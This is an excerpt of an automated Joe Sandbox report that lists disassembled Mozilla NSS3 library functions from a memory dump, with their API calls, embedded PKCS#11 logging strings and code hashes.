NSS_SSL_CBC_RANDOM_IV, xrefs: 6C806FF8
SSLFORCELOCKS, xrefs: 6C806F2B
# SSL/TLS secrets log file, generated by NSS, xrefs: 6C806EF7
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C806F4F
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C806FDB
SSLKEYLOGFILE, xrefs: 6C806EB1

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: de70a6bfc51a93dd1f2812c1bbbb3a573537c33acf5a0ac78d420706abcbd2d2
Instruction ID: 2100a8395ec26f823698cc0c8035fa9a7991e1eb2029b430a1e4ea75bcb78974
Opcode Fuzzy Hash: de70a6bfc51a93dd1f2812c1bbbb3a573537c33acf5a0ac78d420706abcbd2d2
Instruction Fuzzy Hash: D6A1C5B2B559958AF6304A3CCE0174437A2AB9332EF994B79EC31C7ED5DB75A480C381

Function 6C7A6D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C7A6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6DC3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C7A6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C7A6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C7A6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C7A6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C7A6EB9

Strings

pulDigestLen = 0x%p, xrefs: 6C7A6E42
pData = 0x%p, xrefs: 6C7A6DF5
ulDataLen = %d, xrefs: 6C7A6E0E
(CK_INVALID_HANDLE), xrefs: 6C7A6DBC
pDigest = 0x%p, xrefs: 6C7A6E27
C_Digest, xrefs: 6C7A6D81
*pulDigestLen = 0x%x, xrefs: 6C7A6EB4
hSession = 0x%x, xrefs: 6C7A6D9E, 6C7A6DAE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: 0a9e4bfae70bcf7576688a364846de853f0c7554f643a8b0347692bd420e4816
Instruction ID: 4b8b6d630c5735da1ae984678c3cb089b11eae055e7dfc3aab8727baa0e00550
Opcode Fuzzy Hash: 0a9e4bfae70bcf7576688a364846de853f0c7554f643a8b0347692bd420e4816
Instruction Fuzzy Hash: AB41E235602014ABDB209F98CE4DA9A7BB5AB8671CF048474E80897B12DB34BD09CBD1

Function 6C7A8820 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptVerifyUpdate), ref: 6C7A8846
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A8874
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A8883

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A8899
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7A88BA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C7A88D3
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A88EC
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C7A8907
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C7A8979

Strings

ulEncryptedPartLen = %d, xrefs: 6C7A88CE
pPart = 0x%p, xrefs: 6C7A88E7
(CK_INVALID_HANDLE), xrefs: 6C7A887C
C_DecryptVerifyUpdate, xrefs: 6C7A8841
*pulPartLen = 0x%x, xrefs: 6C7A8974
pEncryptedPart = 0x%p, xrefs: 6C7A88B5
pulPartLen = 0x%p, xrefs: 6C7A8902
hSession = 0x%x, xrefs: 6C7A885E, 6C7A886E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptVerifyUpdate
API String ID: 1003633598-2764998763
Opcode ID: fb50912c549cd1815e7ccbcba8b686006f1f3c76cfa85e813c510b0b4f2c6ec9
Instruction ID: 9a40f0050cd0b285f3838f43d0aa7dcac539916ae652fd20c39b9171483570f1
Opcode Fuzzy Hash: fb50912c549cd1815e7ccbcba8b686006f1f3c76cfa85e813c510b0b4f2c6ec9
Instruction Fuzzy Hash: D641A235602094AFDB208F98DF4CA9A7BB1AB4631DF048575E80867B12DB34BD19CBD2

Function 6C7A6960 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6C7A6986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A69B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A69C3

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A69D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6C7A69FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6C7A6A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A6A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6C7A6A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6C7A6AB9

Strings

C_DecryptUpdate, xrefs: 6C7A6981
ulEncryptedPartLen = %d, xrefs: 6C7A6A0E
pPart = 0x%p, xrefs: 6C7A6A27
(CK_INVALID_HANDLE), xrefs: 6C7A69BC
*pulPartLen = 0x%x, xrefs: 6C7A6AB4
pEncryptedPart = 0x%p, xrefs: 6C7A69F5
pulPartLen = 0x%p, xrefs: 6C7A6A42
hSession = 0x%x, xrefs: 6C7A699E, 6C7A69AE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate
API String ID: 1003633598-2105479268
Opcode ID: 4f6fac62e39669071cc611deb01013c5195df48d8676f36d0f4b680a686ee454
Instruction ID: 2f7222b9496b641ef0c440e6608dd250eb7fd85bbd6eb2c7944ed1a97202f82f
Opcode Fuzzy Hash: 4f6fac62e39669071cc611deb01013c5195df48d8676f36d0f4b680a686ee454
Instruction Fuzzy Hash: 6541A135602114EBDB208F98DF4CB9A7BB1AB4631DF048575E90897B12DB34BD49CBD1

Function 6C7DE8C0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 353memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(0000001C,?,6C7DE853,?,FFFFFFFF,?,?,6C7DB0CC,?,6C7DB4A0,?,00000000), ref: 6C7DE8D9

Part of subcall function 6C7D0D30: calloc.MOZGLUE ref: 6C7D0D50
Part of subcall function 6C7D0D30: TlsGetValue.KERNEL32 ref: 6C7D0D6D

Part of subcall function 6C7DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C7DDAE2,?), ref: 6C7DC6C2

PORT_ArenaMark_Util.NSS3(?), ref: 6C7DE972
PORT_ArenaMark_Util.NSS3(?), ref: 6C7DE9C2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7DEA00
PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7DEA3F
SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7DEA5A
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C7DEA81
SECOID_SetAlgorithmID_Util.NSS3(?,?,00000010,00000000), ref: 6C7DEA9E
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7DEACF
PK11_KeyGen.NSS3(00000000,-00000001,00000000,?,00000000), ref: 6C7DEB56
PK11_FreeSymKey.NSS3(00000000), ref: 6C7DEBC2
SECOID_FindOID_Util.NSS3(?), ref: 6C7DEBEC
free.MOZGLUE(00000000), ref: 6C7DEC58

Strings

S}l, xrefs: 6C7DE9CA, 6C7DEAAB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
String ID: S}l
API String ID: 759478663-3344863923
Opcode ID: 0707b81d2066ae237c3c971294568aa5b319f27f17e22f99e2f05006ceaa0496
Instruction ID: 04e72e193da668e078ea542bc58ca6989ad3e83f33e8e91b7f6e26e4c1f825ab
Opcode Fuzzy Hash: 0707b81d2066ae237c3c971294568aa5b319f27f17e22f99e2f05006ceaa0496
Instruction Fuzzy Hash: 04C187B1E012099FEB01CF69DA85BAAB7B4BF44318F160479E90A97751E731F844CBD1

Function 6C774AF0 Relevance: 27.4, APIs: 18, Instructions: 355memorystringthreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,?,6C7B1444,?,?,00000000,?,?), ref: 6C774BD4

Part of subcall function 6C7B0C90: PR_SetError.NSS3(00000000,00000000,6C7B1444,?,00000001,?,00000000,00000000,?,?,6C7B1444,?,?,00000000,?,?), ref: 6C7B0CB3

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C7B1444), ref: 6C774B87
memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C774BA5

Part of subcall function 6C7C88E0: TlsGetValue.KERNEL32(00000000,?,?,6C7D08AA,?), ref: 6C7C88F6
Part of subcall function 6C7C88E0: EnterCriticalSection.KERNEL32(?,?,?,?,6C7D08AA,?), ref: 6C7C890B
Part of subcall function 6C7C88E0: PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7D08AA,?), ref: 6C7C8936
Part of subcall function 6C7C88E0: PR_Unlock.NSS3(?,?,?,?,?,6C7D08AA,?), ref: 6C7C8940

PR_SetError.NSS3(FFFFE02A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C774DF5
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6C774B94

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C7B1444,?), ref: 6C774BC2
PR_GetCurrentThread.NSS3(?,?,?,?,?,00000000,00000000), ref: 6C774BEF
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C7B1444), ref: 6C774C27
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C7B1444), ref: 6C774C42
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C774D5A
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C774D67
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C774D78
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C774DE4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C774E4C
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C774E5B
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C774E6C

Part of subcall function 6C774880: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7748A2

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C774EF1
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C774F02

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Error$Arena$Alloc_Item_Valuememcpystrlen$CriticalEnterSectionUnlockZfree$AllocateArena_CompareCondCurrentFreeNotifyThreadfree
String ID:
API String ID: 24311736-0
Opcode ID: aa1afca5824c81c968ea96f8a4547f2344e1b11fc7b4b7fa14bcf0f672982bf0
Instruction ID: 32452222a1cc7e57a8e94acc66aa4a23d341bfbb0cd9ea7964b1a31b006a8331
Opcode Fuzzy Hash: aa1afca5824c81c968ea96f8a4547f2344e1b11fc7b4b7fa14bcf0f672982bf0
Instruction Fuzzy Hash: D2C15AB5E012199FDF10CF69DA85B9E77F8AF09318F144439E815A7701E771E9048BB2

Function 6C8028C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

TlsGetValue.KERNEL32 ref: 6C80290A
EnterCriticalSection.KERNEL32(00000001), ref: 6C80291E
TlsGetValue.KERNEL32 ref: 6C802937
EnterCriticalSection.KERNEL32(00000001), ref: 6C80294B
PR_EnterMonitor.NSS3(?), ref: 6C802966
PR_EnterMonitor.NSS3(?), ref: 6C8029AC
PR_ExitMonitor.NSS3(?), ref: 6C8029D1
PR_EnterMonitor.NSS3(?), ref: 6C8029F0
PR_EnterMonitor.NSS3(?), ref: 6C802A15
PR_EnterMonitor.NSS3(?), ref: 6C802A37
PR_ExitMonitor.NSS3(?), ref: 6C802A61
PR_ExitMonitor.NSS3(?), ref: 6C802A78
PR_ExitMonitor.NSS3(?), ref: 6C802A8F
PR_ExitMonitor.NSS3(?), ref: 6C802AA6

Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C83945B
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C839479
Part of subcall function 6C839440: EnterCriticalSection.KERNEL32 ref: 6C839495
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C8394E4
Part of subcall function 6C839440: TlsGetValue.KERNEL32 ref: 6C839532
Part of subcall function 6C839440: LeaveCriticalSection.KERNEL32 ref: 6C83955D

PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C802AF9
free.MOZGLUE(?), ref: 6C802B16
PR_Unlock.NSS3(?), ref: 6C802B6D
PR_Unlock.NSS3(?), ref: 6C802B80

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
String ID:
API String ID: 2841089016-0
Opcode ID: 9c25a2ac177ea6cdacb83345d84c13b3247c798b9d7d32444a427851b645b186
Instruction ID: 72d43ad1e38f938f066de3fb26e9eb0ff28da562f2453fab72a39dffb853d20b
Opcode Fuzzy Hash: 9c25a2ac177ea6cdacb83345d84c13b3247c798b9d7d32444a427851b645b186
Instruction Fuzzy Hash: 8C81A2B5A00B009BEB309F39ED49B97B6E5AF05308F044D38E85AC7B11EB35E519CB91

Function 6C7C8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8E9E
PORT_ArenaAlloc_Util.NSS3(6C8D0B64,00000001,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C7C8E01,00000000,6C7C9060,6C8D0B64), ref: 6C7C8EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C7C8E01), ref: 6C7C8EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C8D0B64,6C8D0B64), ref: 6C7C8F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C7C8F3F

Part of subcall function 6C7CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C7CA421,00000000,00000000,6C7C9826), ref: 6C7CA136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7C904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C7C8E76

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: d0a68b3237fe275601ed312b001ca322e26939ea0db2aa6a69984eaa2fbd7d29
Instruction ID: 82b4ae10bf9c99f21efd98fc06fcf75ea4ec588cc5fd836be3b493d95f4a80cc
Opcode Fuzzy Hash: d0a68b3237fe275601ed312b001ca322e26939ea0db2aa6a69984eaa2fbd7d29
Instruction Fuzzy Hash: F161ACB5E0120AAFDB10CF55CE80AABB7B9EF94358F144538DC18A7B00E731E955CBA1

Function 6C778E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C778E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C778E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C778EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8A18D0,?), ref: 6C778F03
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C778F19
PL_FreeArenaPool.NSS3(?), ref: 6C778F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C778F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C778F65
PL_FinishArenaPool.NSS3(?), ref: 6C778FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C778FFE
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C779012
PL_FreeArenaPool.NSS3(?), ref: 6C779024
PL_FinishArenaPool.NSS3(?), ref: 6C77902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C77903E

Strings

security, xrefs: 6C778EE7

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 9d81ae068b6563fe48dc988b5cdde47f41d102abdb7d0b4f1259771fb5c9256f
Instruction ID: 6cb2bf503867ded2281200304f10dbf1a2b2bdd9883991ff76bca0b1bb71cb97
Opcode Fuzzy Hash: 9d81ae068b6563fe48dc988b5cdde47f41d102abdb7d0b4f1259771fb5c9256f
Instruction Fuzzy Hash: 89514A71608204ABDB305A58DF49FAB37A8AB8675CF45083EF455A7B40D771E908C7A3

Function 6C7A4E60 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6C7A4E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A4EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4EC7

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A4EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C7A4F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A4F1A
PR_LogPrint.NSS3(?,00000000), ref: 6C7A4F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C7A4F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C7A4F68

Strings

hObject = 0x%x, xrefs: 6C7A4EF5, 6C7A4F05
(CK_INVALID_HANDLE), xrefs: 6C7A4EC0, 6C7A4F13
C_GetAttributeValue, xrefs: 6C7A4E7E
pTemplate = 0x%p, xrefs: 6C7A4F4A
hSession = 0x%x, xrefs: 6C7A4EA2, 6C7A4EB2
ulCount = %d, xrefs: 6C7A4F63

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

